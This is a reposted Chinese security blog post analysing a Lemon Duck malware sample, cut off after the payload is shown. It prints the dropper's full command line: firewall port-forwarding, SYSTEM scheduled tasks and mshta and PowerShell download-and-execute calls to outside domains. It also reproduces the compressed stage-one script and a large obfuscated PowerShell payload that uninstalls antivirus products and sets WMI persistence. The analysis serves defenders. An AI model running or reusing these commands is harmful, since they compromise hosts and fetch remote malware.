Sec Hotspot 首页  排行榜  收藏本站  技术博客  RSS
统计信息
已收录文章数量:17683 篇
已收录公众号数量:91 个
本站文章为爬虫采集,如有侵权请告知
已收录微信公众号
阿里云先知 网安寻路人 网信中国 区块链大本营 白说区块链 区块链投资家 区块链官微 区块链铅笔Blockchain HACK学习呀 二道情报贩子 合天智汇 小白帽学习之路 小米安全中心 弥天安全实验室 SAINTSEC SecPulse安全脉搏 TideSec安全团队 360安全卫士 游侠安全网 计算机与网络安全 安全祖师爷 安全学习那些事 腾讯安全联合实验室 黑客技术与网络安全 安全圈 腾讯御见威胁情报中心 Python开发者 Python之禅 编程派 Python那些事 Python程序员 安全威胁情报 吾爱破解论坛 行长叠报 安在 i春秋 嘶吼专业版 E安全 MottoIN 网信防务 网安杂谈 数说安全 互联网安全内参 漏洞战争 安全分析与研究 邑安全 ChaMd5安全团队 天融信阿尔法实验室 安全牛 SecWiki 安全学术圈 信安之路 漏洞感知 浅黑科技 Secquan圈子社区 奇安信集团 奇安信 CERT 国舜股份 雷神众测 盘古实验室 美团安全应急响应中心 瓜子安全应急响应中心 顺丰安全应急响应中心 蚂蚁金服安全响应中心 携程安全应急响应中心 滴滴安全应急响应中心 字节跳动安全中心 百度安全应急响应中心 腾讯安全应急响应中心 网易安全应急响应中心 OPPO安全应急响应中心 京东安全应急响应中心 Bypass CNNVD安全动态 安恒应急响应中心 天融信每日安全简报 奇安信威胁情报中心 看雪学院 黑白之道 水滴安全实验室 安全客 木星安全实验室 云鼎实验室 绿盟科技安全预警 白帽汇 深信服千里目安全实验室 腾讯玄武实验室 长亭安全课堂 FreeBuf 绿盟科技 nmask
柠檬鸭组织样本分析
本文来自公众号:HACK学习呀   2021.01.14 14:31:30


起因

分析

1.txt

文本内容如下

cmd /c echo RmMrcM >> c:\windows\temp\msInstall.exe&echo copy /y c:\windows\temp\msInstall.exe c:\windows\kNnk.exe>c:/windows/temp/p.bat&echo "*" >c:\windows\temp\eb.txt&echo netsh interface ipv6 install >>c:/windows/temp/p.bat &echo netsh firewall add portopening tcp 65532 DNS2  >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo netsh firewall add portopening tcp 65531 DNSS2  >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo netsh firewall add portopening tcp 65529 DNSS3  >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo if exist C:/windows/system32/WindowsPowerShell/ (powershell -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAHQALgBhAG0AeQBuAHgALgBjAG8AbQAvAGcAaQBtAC4AagBzAHAAJwApAA==^&schtasks /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn BIzdRfgY /tr "c:\windows\kNnk.exe" /F) else start /b sc start Schedule^&ping localhost^&sc query Schedule^|findstr RUNNING^&^&^(schtasks /delete /TN Autocheck /f^&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.zz3r0.com/page.html?pBS_S-AUDIT"^&schtasks /run /TN Autocheck^&schtasks /delete /TN BIzdRfgY /f^&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN BIzdRfgY /tr "c:\windows\kNnk.exe"^&schtasks /run /TN BIzdRfgY^&schtasks /delete /TN Autoload /f^&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autoload /tr "c:\windows\temp\installed.exe"^&schtasks /run /TN Autoload^) >>c:/windows/temp/p.bat&echo net start Ddriver >>c:/windows/temp/p.bat&echo for /f  %%i in ('tasklist ^^^| find /c /i "cmd.exe"'^) do set s=%%i >>c:/windows/temp/p.bat&echo if %s% gtr 10 (shutdown /r) >>c:/windows/temp/p.bat&echo del c:\windows\temp\p.bat>>c:/windows/temp/p.bat&echo c:\windows\temp\installed.exe>>c:/windows/temp/p.bat&cmd.exe /c c:/windows/temp/p.bat&cmd /c c:\windows\temp\installed.exe

简单格式化下

cmd /c echo RmMrcM >> c:\windows\temp\msInstall.exe& echo copy /y c:\windows\temp\msInstall.exe c:\windows\kNnk.exe>c:/windows/temp/p.bat&echo "*" >c:\windows\temp\eb.txt&//配置网卡、防火墙echo netsh interface ipv6 install >>c:/windows/temp/p.bat &echo netsh firewall add portopening tcp 65532 DNS2  >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo netsh firewall add portopening tcp 65531 DNSS2  >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo netsh firewall add portopening tcp 65529 DNSS3  >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&//powershell命令echo if exist C:/windows/system32/WindowsPowerShell/ (powershell -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAHQALgBhAG0AeQBuAHgALgBjAG8AbQAvAGcAaQBtAC4AagBzAHAAJwApAA==^&//计划任务配置schtasks /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn BIzdRfgY /tr "c:\windows\kNnk.exe" /F) else start /b sc start Schedule^&ping localhost^&//检查定时任务是否已启动sc query Schedule^|findstr RUNNING^&^&^(schtasks /delete /TN Autocheck /f^&//mshta下载马,截至分析时已无法访问schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.zz3r0.com/page.html?pBS_S-AUDIT"^&//计划任务操作项schtasks /run /TN Autocheck^&schtasks /delete /TN BIzdRfgY /f^&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN BIzdRfgY /tr "c:\windows\kNnk.exe"^&schtasks /run /TN BIzdRfgY^&schtasks /delete /TN Autoload /f^&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autoload /tr "c:\windows\temp\installed.exe"^&schtasks /run /TN Autoload^) >>c:/windows/temp/p.bat&//创建批处理,内容为启动服务echo net start Ddriver >>c:/windows/temp/p.bat&echo for /f  %%i in ('tasklist ^^^| find /c /i "cmd.exe"'^) do set s=%%i >>c:/windows/temp/p.bat&echo if %s% gtr 10 (shutdown /r) >>c:/windows/temp/p.bat&echo del c:\windows\temp\p.bat>>c:/windows/temp/p.bat&echo c:\windows\temp\installed.exe>>c:/windows/temp/p.bat&cmd.exe /c c:/windows/temp/p.bat&cmd /c c:\windows\temp\installed.exe

批处理功能

设置防火墙规则,转发65532、65531、65529的请求到1.1.1.1 创建计划任务定时启动 写入批处理检测 cmd.exe 进程 如果 cmd.exe 进程数量大于10则重启机器

powershell命令 下载执行PS脚本

powershell解码后如下

IEX(New-ObjectNet.WebClient).DownloadString('http://t.amynx.com/gim.jsp')

gim.jsp 下载下来是一个 Poweshell 文件

gim.jsp 第一阶段攻击脚本

gim.jsp

I`EX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('edbd07601c499625262f6dca7b7f4af54ad7e074a10880601324d8904010ecc188cde692ec1d69472329ab2a81ca6556655d661640cced9dbcf7de7befbdf7de7befbdf7ba3b9d4e27f7dfff3f5c6664016cf6ce4adac99e2180aac81f3f7e7c1f3f227eb7bd7999a69fa51fddf9f8ddc79f7c7fffdef7f2c597df7efdf277fbe4fbbb7bdfcbbff872fe7af5bba55bbf30fd993b9fdefbfeabecdb27df1b7dfce264fe719a9e9e64e52a7fb59da60fed375f9db7fe37773efe8d93df38f9f8938fefa477f64da33b0f7777e5d74f761ee017fa9e7e7ff8f0fbafe8377cbe45009eaf72faebd53660ebc7a33bf7ed9b0fe9b307fafb03f3e9564a9fe6e8fcf4d5743bdddfdb75ef12663ff1d36fe85f81fd6adb0e873efbceec84feb56fd23be91ea193d12fdae2cdab87f46f6a5e4ed34f1feaeb77f6a895c5ebc0feb6b783cf0d62a9057e87e03cbb9b664dfb2a5db677d3bccdcb7c76376dde36593b9f36a0187dbfeb35a0373e017e9d76049f9bee69536d160789ff7e09fec9a775f5ecf7f83d7e8f74370585d765f693dbe9d3575f7ef72926ef938f0122cd57d76fb6d36555344d5eaf16d5495e4eb2a6789a5e3d9b36d4a8ced1345f6475f6924853e79775fe7a992d96d973fab3c9a7053ea05fdbfc7559d5edb23a6997795daf4fe8b32f4edfbcfe7df0e5a32f9eff5edf2688e9bccd5e6ea7d76d9dafaafae5226fcfb6e9c5941e60fc765a9593cf0819f439cdd2fbf7763f6beb6a556653faa02ad3157ee2cbcfca6a5ab555bd4a97c56775314bafe8c3674a17bc4caf5e2ff319f5f91921bffc8a3e932fd3bc5cd7e96c96a565995de575716e7fb9a40fe74d9b2ffbf80099fd7d834c556a4f84501c9b67d3fbfbf4c5fef512d42334f405c14671a0af3a6868ab3836f7ee73ffed345f2eab69ba3be6ff3ec3c4d170e463d34dfa70effefd4fb9fd326f9ba24cf72fab76ff92077efd8e50a5afb4f1ca0c269f66e7fa3b4dfbb248f377f9384061f6fac5d3d7021b1248a34f2f96c59226133d8554752f4feff21f18ee622aa0b41be25488606afe411ff7d3559e970d64b3adb3b649f561bebef34b30d18e7f9f4d0964b1a0bfae48b40186d401cdfbac98a757db844c3e172ebe22f4a677991d5a924fbc91bfc997c5f3193133b1fd217d0524091cf1ebde3d62cde6ba018b5f55b3657105269ee275703064a45d53fbd34348d602eae3453e8776f9e4ea19d86faa8cf7e217ff9e694302b1585fd4c7dbe00b70d3aaa8a7cd640df0ad9985aa867ce46602b35583d75943d52c81eb4664ebf2d4a22da4e0b74fd2a6c9ca936d9ac425116d79562cbe0bd1dafaacced18edf3ebc4313f53a054f82a7e55dd0f9b8aeeafa743bfd252043f3e59a47fffaf77ffda5e38797bfbffe9ab5d9d3196b85365b908639c7777bf796c577e9c5f4f8f519a1a04d8109b55b9eb5f9459d4127ebb4a5a7af4ebffddd7467e7d37be98bb36fbf39fb6eca235b0a3a3ca2c2a8b96c5a9c17b3ea0b33b2dffff74fbff8f2d5b3f45be99b93d3e7a7af85e29f5dd7f9fa2780fff39ff82e53ff225b5f909ab29fef5d2e0a9a5c854a9407c9f95562fcd56b909b9138c46f7636a7e7fe54023b3b9be03a9d50fad59f539d4c03763b25792a8b672d6b83cb531ac1f06ca161c8358a718f79ecf4032bf46a260b9da327cb45e9c5b2202e7e522b1b556fa49f414444e4582c217777686a57cd4f8fb38c7e19993fe8e716f5411e403dbe73e7fe16a982ba056af4de784de41b2942d470efab4eeb11aca6bc42bfe02d79859aed066d9bd50253f1190b3aa4dc28848f455f2c33108238ec33376f167941df687ffef18bef34e88854758a9f5bf36996d7956174f38a080aa4242a1bda9a4504fcaf42312c11425d91038ffb81642000d423f81dfcb489e5e9fb673196a7cf235c6f948ae3cd2ecbd347a4b8276f89e613fa9dc0f8da4bdfef2a31c36ec28ef48e016ffa8b49c026f637c4ffc57776dba29aa9466fabe5f6d679a10ee62ff9c5f32991883d1c99108b38fdeeec3ce30f41e08ecfb753fa76a9887555705563a22cb2da6a006732b43f3df9f2ec0b60fcf967065146fbba6e3dff0bc8fe985a34a3fa183d366f64dbc0b646427eecc7f41550172c4c889df32f1803bcc3e5ba768e9e34df1553c93018f2365b4cf9f297c80fede097fc987eaae4fb31f3f78fd18be68fb25c2fb7db7545fef31dfcfe1dbc2c5a860466b4938ef853fcaebf607e46fbe9e80ee49ffeb02ac00a7357f09dc62215e0544620fcf46d4ffe474487a75f9cfcfeaf5fd22ff6cb72f17b8f4112c6097367fedaa29f50724d7191bf1ad7f9acaccebf038febe4c7f8c1707fec17dfb9a350e90b010c5db42c32f263d176dce5feb13883e8e0bcb08030f1f6f7f44e633c58695e18b62bcef3a7165b523f0c4bbf6390a9ea2203ea0e0121755378efe0577d459497795fde6365ad1fed6e815bde1097daf19f7ce681d3d63071c468fa12331e08c1af3cc3cb9775d33678d74209b8cff0dcc750c7fc8f729e9db0884fc60e194b2771364536835cbff3695a2deea6a76fbe7a71f605b86ddadc5583081e82fb85b14f7dd1d079c89b324f7fd6706144c44b4c2199b943c3494d80d09d0c5464be51bb45e68022f2a59b8c5ff24be853f5810081851aa64d10f9c518d22fb9236f6e7d42d2621dd4efaafe3daf5e57b543605a7c41adf03a5eb718fce23b7be92fcaad6771ef772ff0397a53e47e89f4615fdce5e6d4ce91de1fcb2f69be5450105dee917ed17777ccbbfe1b7744dee95f7d91befaf25d3e5b9e3d7af4fdebacaeb3ef1169f08aa15ed46aab0ed3297626ec63d84733a1f663f00f4fe4de2ecda476ec4da8fdc49b4c4fdd5a96ea74476027e249f67ae4ee14acf4ba917f00e32e3c974ec78e75e44f353abe69f4ed22f40623e4318267debd4fb78c86801a08259f5af8c2df16f441cfd4ddd992b8f3441a52136ee0cc30d2109c221853cc3bcbe7d3d76a4029e632b674fb2a7f41936dbaf2a243f89d0b68e2e9f8ddf27a918de14a8ef8c3e9f882b2113f709fe84b95d188e39dfade0fe4fbaddff333e61ea6d39d3b9ffeeeac58496cb25730e25b9f7cba45eed71a18b94f7fe2a7a9d19b3b7b7bbbe3f183879fec3c1c8f15f2fd4f3f79707f3c3ed8dffafef7bf5767f3e9f7b69645f5d3a458ea759bd7bfd828e02d1571d2f31098e9727d6e346e5db51919be62592c60948e79c2a6e9f7f3b27a456ea202288bf513116f9e2e560bf4f1770d226526b13b53bb98922d7d39be6e8b7aaddfc38fcb5f7f6f0b509767cd1999df2dcdced00021686d417fcfce6c27df1d134c1fd294deffbefd4c758dd788deb936e86af3adcf3299c6df3821dadfc11cd2ffa8e1b7e437a6d59d3b4ce97a6bf4f4ecabafc677da295acc242944b12799ee35d25126ea64775af8a5a230601b0a7074fac5f18b57a7afbf7a74b9cca14ee4ef375f31b5f8b5975f7c79a2df6efd9eac31e97fbf07fdff136d7049dfe0630e68eecaf79f9435eb98ec50fe6617069fcb8f5df3a78290bfeede7db46adb39ffa15fac3f1340bfe497fc923b13fa69b805aa1134d87a97af2ecfcf7eb136271feacef7f5f7dd07c4753bdf9b7d0744b12f82cdb401bdcdbed3ebfd4ff3267bb2a8ea67349f14a75f526e083d98d8eb0e8973714974851cea67b5fecc5f57edeaba8617b77bfcedd7e3ebf92aab2fe4333bfd42746ac272ba35c248602a10f25c73a0429d8e0d4851538746045632802d32b2ad2411912882f49d8d6b6a7bc8d8696345b236681dbf7ed54789de7558314a9f31a0dd9d773b18f3c79261d8c19ff8ec336270ebf7afde9d8e57680da674d3f7d9ce6ef6edd9f32f7fd1f9aa7ef0ead3dfe72c3fdffde95d827439fd89af56cff7eefea09cfcf4eae4f9d39f9edc3ff862e7e4feef53ae7fd177df2e4fbeca5f3c9fef9fe7bfa8d87ff58377cb7bd3e3d73f7530bd7afb6aa7deb9470ee3f3c9faf9ea60f7e079317dfadd9d57bfcfdd370b2491eb7bbfd78345f9eddfe76c5ab43f78f30333febd172fee7d71f5f0ec634d650a1bbffce9fdb7f577cff1dea73fd97e7bb27eb15cbc7971efeee5c1e50574c762f57bd3bf4f763fbfa41fbff7fac16ef5ddc51eb3214865b984b9c412da328bf9847986b42429e9ea8bb18d57ce3dc7f0d04d22cd8c7ebc8967303bdaecc5674cf6ef4fe9dff1f8de83ddefc1927c3611f6f8c577e893b4bdd84ea7e2a38385a090a7636e36956687f42ffb0d5ba42b39e2ceaa7279553da53f49832cf3a224793a99e4df1db7645108077a813e0126f4db15fd4a0cfc1940fe628193890f4e8a195ca09106eb68fa7b36fbe28b6b7a7e7ffa3d95c89ed37164a99f8ad9a07ea13fe8c3df0331f5a5becc0e311b7343dd25b912f9bb6a72d12c38cfbe5a376ce609e7b2682856bf64b713d452b2532a726767874291257cbcbcceaecaec8b6dd2d6c79c766faf27fa19fdb9fb4b3103f54bce083d7cc4fe2ab91194300136f9252216247421ab40855c819621e3b72967fabf5cffee76ee9648e6bef8dd31eafc6d511af705896b40ceeb7c7e45c42546a1843772a6c8cba493bba9a46b633d53b7d4b9f64cbf312a9dfe9b755dfc2406e87aee74492fbd6faf66b0d21f662f36e4a11e3143efdfa3d20b6ea14768fd943bc740d0ffea32eb75edaf541012e05b436c05f13eb8b8a9f6c7dd3666a5c1438059fbc3e638d29f19eaef7efd5612f110c906a98fdfeb7747d7764c3d0ce8af9b90c00bd00c40e563449e061b16ad028e63809399199f1479733ac870a66b7d2f4a06ea6331a52fb7b6d2ad14668ffeb73cabbeb32d13f90eef7effde68f77b77b63e7f51bc2273f3667c3a7d91bf3a7d76fa6a9537d5a43efd495a674db7c61f6f6d7d941ea6bf702bfddd4e5ffce4a3932fbf685e9e4ebfb73fdabd3fdabbfffdedef5467cb8f698595ba4a3f3f7db3fd93d9abb3ec49799aee7d9b9676b72f8fcbaf4ebf5cdef9de36ad0d8db76f6a367e7efae2f337f3f44eca905f7cfc31fdfa1b27ff0f'-split'(..)'|?{$_}|%{[convert]::ToUInt32($_,16)}))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

解密后内容如下(参考链接:5分钟解码powershell payload)

$2hl  = ")'x'+]43[emOHSP$+]12[eMOhSp$ (& |)63]RaHC[,'NCh'  ECalpeR-  93]RaHC[,'Uft'  ECalpeR- )''+') )43]RaHC[,)911]RaHC[+07]RaH'+'C[+99]R'+'aHC[(ECaLpe'+'R-93]R'+'aHC[,)511]RaHC[+9'+'7]RaHC[+711]RaHC[( '+'eCalpERc- 421]R'+'aHC[,UftQjTUftECaLpeR-63]RaHC[,UftJdCUfteCalpERc-'+' 29]Ra'+'HC[,UftTR9Uft ECaLpeR-  69]RaHC[,)2'+'11]RaHC[+811]RaHC[+20'+'1]RaHC[(  eCalpERc-)UftF/ astR nt/ eteled/ sksathcsF/ 1astR nt/ etUft+Ufteled/ sksathcs'+'F/ 2astR ntUft+Uft/ eteled/ sksathcs}ecroF??? 1 e'+'ulaV- DROWDUft'+'+Uft epyT- noisserpmoCelbasiD wFcs'+'ret'+'emaraPTR9revreSnamnaLTR9secivreSTR9teSlortnoCtnerruCTR9METSYSTR9:MLKHwFc htaP- ytreporPmetI-teS    kcolb=noit'+'ca 531=troplac'+'ol pc'+'t'+'=locotorp ni=rid w'+'FUft+Uft'+'c531ynedwFc=emanU'+'ft+Uft elur dda llawerif llawerifvda hsten    kcolb=noitca 544=troplacolUft+Uft pct'+'=locotorp ni=rid wFc54'+'4yn'+'edwFUft+Uftc=eman elur d'+'da llawerif llaUft+Uftwerifvda hsten    35=troptcennoc 1.1.1.1=sserddatcennoUft+Uftc 92556=tropnetsil 4vot4v dda yxorptroUft+UftpUft+Uft ecafUft+Uftretni exe.hsten    dSNDS 92556 '+'pct gninepotrop dda llawerif exe.hsten c/ exe.'+'dmc    Uft+Uft}'+'  '+'  '+'5 peels-'+'trats        })}w'+'Uft'+'+UftFcdmcim'+'wJdC'+' c- neddih w- llehs'+'rewop c/wFc=etalpm'+'eTeniLdnammoC;wFcexe.dmcTR923metsysTR9swodniwTR9:cwFc=htaPelbatucexE;e'+'ma'+'NehtJdC+wF'+'ccwFc=emaN{@ stnemugrA- wFcnoitpircsbusTR9toUft+UftorwFc eUft+UftcapsemaN-'+' r'+'emusnoCtnevEeniLdnamm'+'Uft+UftoC ssalC- ecnatsnIimW-teS(=rem'+'usnoC;)potS n'+'oitcUft+Uf'+'tArorrE- };wFcsOumetsyS_SOfUft+UftreP_Uft+UftataDdet'+'tamroFfreP_23niWsOu ASI ecUft+Uftnats'+'nItegraTUft'+'+Uft EREHW 0063 NIHTIW tnevEnUf'+'t+UftoitUft+UftacifidoMecnatsnI__ MORF * TCELESwF'+'c=yreuQ;wFcLQWwFc=egaugnaLyreuQ;wFc2vmicTRUft+Uft9toorwF'+'c=ecapSemaNtnevE;emaNehtJdC+wFcfwFc=emaN{@ s'+'tnemugrA- '+'wFcnoitp'+'ircsbusTR9toorwFc ecapSemaN- retliFtn'+'evE__ ssalC- ecnatsnIimW-teS(=retliF{@ stnemugrA- Uft+UftwFcnoitpircsbusTR'+'Uft+Uf'+'t9tooUft+UftrwFc '+'ecapsemaN- gnidniBremusnoCoTretliF__ ssalC- ecnatsnIimW-teS      '+'  )sOupsj.aasOu,sOupsj.asOu(ecalper.))5(gnirtsbus'+'.uJdC,Uft+UftsOu2UsOu(ecalper.))5,0'+'(gnirt'+'sbus.uJdC,sOu1UsOu(ecalper.spmtJdC=dmcimwJdC        '+'naR'+'teg=emaNehtJdC    '+'    U'+'ft+U'+'ft{)suJdC ni uJdC(hcaerofUft+Uft    potS noitcArorrE- };wFcsOumetsyUft+UftS_SOfreP_ataDdettamroFfreP_23niWsOu ASI ecnatsnItegraT EREHW 0063'+' NIHTIW tnevEnoitacif'+'idoMecnatsnI__ MORF * TCELESw'+'Fc=yreuQ;wFcLQWwFc=eg'+'augnaLyreuQ;wFc2vmiUft+UftcTR9toorwFc=ecapSemaNtnevE;wFcllabkcalbwFc'+'=emaN{@ stneUft+UftmugrA- wFcnoitpiUft+UftrcsbusT'+'R9toorwFUft+Uftc ecapSemaN- retliFtnevE__ ssalC- ecnatsnIimW-teS    {)1tiodJdC'+' ton-(fi'+'}{hctac}wFcsOullabkcalbsOuU'+'ft+Uft=emaNwFc retlif- sOunUft+UftoitpircsbusTR9toorsOu ecapSemaNUft+Uft- retliFtnevE__ ssalC- tcejbOIMW-teG=1tiodJdC{yrt}'+'}    5 pUft'+'+U'+'fteels-tra'+'tUft+Ufts        '+'wFcntJdCTR9fntJdCwFc nt/ nur/ sksathcs        1 peelsUft+U'+'ft-trats        }        Uft+Uft}            }{hctac}                }    '+'                llun-tuoQjT)llunJUft+'+'UftdC ,0 ,llunJdC ,llunJdC'+' ,4 ,)))5('+'gnirtsbus.uJdC,sOu2UsOu(ecalper.))Uft+Uf'+'t5,0(gnirtsbus.uJdC,sOu1UsO'+'u(ecalper.spmtJdC,wFcDMC_SPwFc(ecalper.lmX.ksatJdC ,emaN.ksatJdC(ksaTretsigeR.redlofJd'+'C                            {))wFcDMC_'+'SPwFc('+'sniatno'+'C.stneUft+UftmugrA.noitcaJdC(fi                    {yrt                { )snoit'+'cA.noitinUft+UftifeD.ksatJdC ni noitcUft+UftaJdC( hcaerof            {)'+'metiksatJdC ni ksatUft+UftJdC(hcUft+Uftaerof        )Uft+Uft1(sksaTteG.redlofJdC=metiksatJdC        )wFcfntJUft+UftdCTR9wFc(redloFteG.vrstsJdC=redlofJdC        1 peels-trats        '+''+'}        wFcDMC_SP c- neddih w- llehsrewopwFc rt/ F/ wFcntJdCTR9fntJdCwFc nt/ 06 om/ ETUNIM'+' cs/ Uft+Uf'+'te'+'taerc/ sksathcs            { esle }        wFcDMC_SP c- neddih w- llehsrewopwFc rt/ F/ wFcntJdCTR9fntJdCwFc nt/ 06 om/ ETUNIM cs/ metsys ur/ etaerc/ sksUft+'+'Uftathcs            {)asJdC(fi        naRteg = ntJdC        }}naRUf'+'t+'+'U'+'ftteg=fntJdC{esle})naRteg(+sOuTR9swodniWT'+'R9tfoSorUft+'+'UftciMsOu=fntJdC{)asJdC(fi{)2 qe- Uft+Uft3%iJdC('+'fi        }naRteg=fntJdC{)1 qe- 3%iUft+Uf'+'tJdC(fi        }sOUft+Uft'+'usOu=f'+'ntJdC{)0 qe- 3%iJdC(fi        )uJdC,suJdUft+UftC(fOxednI::]yarra[ = iJdC        {)suJdC ni uJdC(hcaerof    }    wFcllabkcalbw'+'Fc rt/ F/ llabkcalb'+' nt/ 021 omUft+Uft/ ETUNIM csUft+Uft/ etaerc/ sksathcs        { esle }    wFcllabkcal'+'bwF'+'c rt/ F/ llabkcalb nt/ Uft+Uft021 om/ ETUNIM cs/ metsys ur/ etaer'+'c/ '+'sksathcs        {)asJdC(fi    {)tiodJdC ton-(fi}{hctac})'+'wF'+'Uft+'+'UftcllabkcalbwFUft+'+'Uftc(ksaTteG.)wFcTR9wFc(redloFt'+'eG.vrstsJdC=ti'+'odJdC{yrt)(tcennoC.vrsts'+'JdCU'+'ft+UftecivreS.eludehcS tcejbOmoC- tcejbO-weN = vrstsJdCUft+Uft)sOumo'+'c.xnyma.tsOu,sOumoc.g9rez.tsOu,sOumUft+UftocUft+Uft.0r3zz.tsOu(@=suJdC}))6%)'+'modnaR-teG(+6( tnuoC- modnaR-teGQj'+'T)221..79+09..Uft+Uft56+75..84(]][rahc[(nioj- nruter{)Uft+Uft(naRteg noi'+'tcnuf)wFcrotartsinimd'+'A'+'wFc ]eloRnItUft+UftliuBswodni'+'Uf'+'t+UftW.Uft+UftlapUft+U'+'fticnirP.ytiruUft+Uftc'+'eS[(eloRnIsI.))(tnerruCteG::]ytitnedIswodni'+'W.lapicnirP.ytiruceS[]lapicnirPswodniW.lapicnirP.'+'ytUft+UftiruceS[(=asJdCsOu))sOusOu'+'*sOusOunioj-))modnar(,DIUU.)tcu'+'dorPmetsySretupmoC_Uft+Uft23niW tcejboimw-teg(,EMANRESU:vneJdC,EMANRETU'+'Uft+UftPMOC:vneJdC(@(+sOusOu?sOu+Uft+UftvJdC+sOupsj.a/sOusOu+lruJdC(a;sOusOu2UsOusOu+sOusOu1UsOusOu+Uft+UftsOusOu//:ptthsOusOUft+Uftu=lruJdC}}})bJdC]][rahc['+'nioj-(xepvfI{Uft+Uft))))]Uft+Uft171..0[dJ'+'dC]][rahc[(nioUft+Uftj-(gnirtS46esaBmorF::]trevnoc['+',Uft+Uft)redivorPecivUft+UftrUft+UfteSotpyrC'+'1AHS.yhpargotpyrC.ytiruceS tcejb'+'O-weN(,bJdC('+'ataDyf'+'irev.rUft+UftJdC(fi;)Uft+UftpJ'+'dC(sretemaraPtrop'+'mI.rJdC;redivUft+UftorPecivreSotpyrCASR.yhpargotpyrC.ytir'+'uceS tcejbO-weN=rJdC;10x0,Uft'+'+Uft00x0,10x0=tnenUft+UftopxE.pJdC;)sOuUft+UftsOu=01aHdLOqfpr7R6YIef1j1'+'vcQUpL2/zlbjpCLDjb58M0C5YluqWknCUeNLh4feqi4Rzxn3cASZ8cwkR0r03mugLbuLp818LicDW0RY/Tm2'+'r3K7mlHYIcitzTzvUft+Uft2NN3Mw9I'+'FUft+'+'UftPj4krWf2'+'6VtHbuNnmTN3/v8vgd'+'mpX'+'B1Gv'+'Xu71oWm2sOusO'+'u(gnirtS46esaBmUft+UftorF::]trevnUft+Uftoc['+'=suludoM.pUft'+'+UftJUft+UftdC;sretemaraPASRUft+Uft.yhpargotpyrC.ytiruceS tcejbO-weUft+UftN=pJdC;]cJdC..371[dJdC=bJ'+'dC{)371 tg- cJd'+'C(fi;tnuoc.dJdC=cJ'+'dC;'+')uJdC(wFcataDdaolnwoDwFc.)tneilpvfCbeW.teN tce'+'pvfjbO-'+'wpvfeN(=dJdC{)uJdC(a noitcnufsOu=spmtJdC)sOuddMMyyyy_sOu tamroF-'+' etaD-teG(+wFcvJdC'+'?wFc=vJdCtratser'+'Uft+Ufton/ sexobgsmsserppus/ '+'tnelisyrev/ wFceUft'+'+Uftxe.000sninuTR9erawlaM-itnATR9setyberawlaMTR91~argorPTR'+'9:CwFc c/ dmcevitcaretn'+'ion/ llatsninu llac wFcsOu%ytiruceS notroN%sOu ekil Uft+UftemanwFc erehw tcudorp exe.cimw b/ trats c/ dmcevitcaretnion'+'/ llats'+'n'+'inu llac wFcsOu%suriVitnA%sOu ekil emanwFc erehw t'+'cudorp exe.cimw b/ trats c/ dmcevitcaretnion/ llatsn'+'inu'+' llac wFcsOu%ytiruceS%sOu ekil emanwFc erehw '+'tcudorp exe.cimw b/ trats c/ dmcevitcaretnion/ Uft+Uftl'+'latsninu llUft+Uftac wF'+'csOu%pva%sOu ekil emanwFcU'+'ft+Uft ereh'+'w tcudorpUft+Uft exe.cimw b/ trats c/ dmcevitcaretnion/ llatsninu llac wFcsOu%tsaUft+Uftva%sOu ekil'+' emanwFc erehw tcudorp exe.cimw b/ trats c/ dmcevitcaretnion/ llatsninu llac wF'+'csOu%%yks'+'re'+'psa'+'K%%sOuUft+Uft ekil'+' emanwFc er'+'ehw tcudorp exe.cimw b/ trats c/'+' '+'dmc'+'evitcare'+'tnio'+'n/ llatsninu Uft+Uftllac wFcsOu%tesE%sOu ekil emanwFc erehw tcudorp eUft+Uftxe.cimw b/ trats c/ d'+'mcUft(( ( )UftUftnIoJ-U'+'ftxUft+]3,1[)(GNiRtsOT.EcNeREFERpesobrEVNCh (.'((" ; ((  GET-VaRIaBlE 2Hl  -vAlUEOn)[- 1..- ((  GET-VaRIaBlE 2Hl  -vAlUEOn).LENGTh ) ]-JoIN'' ) 

对字符串翻转、美化后

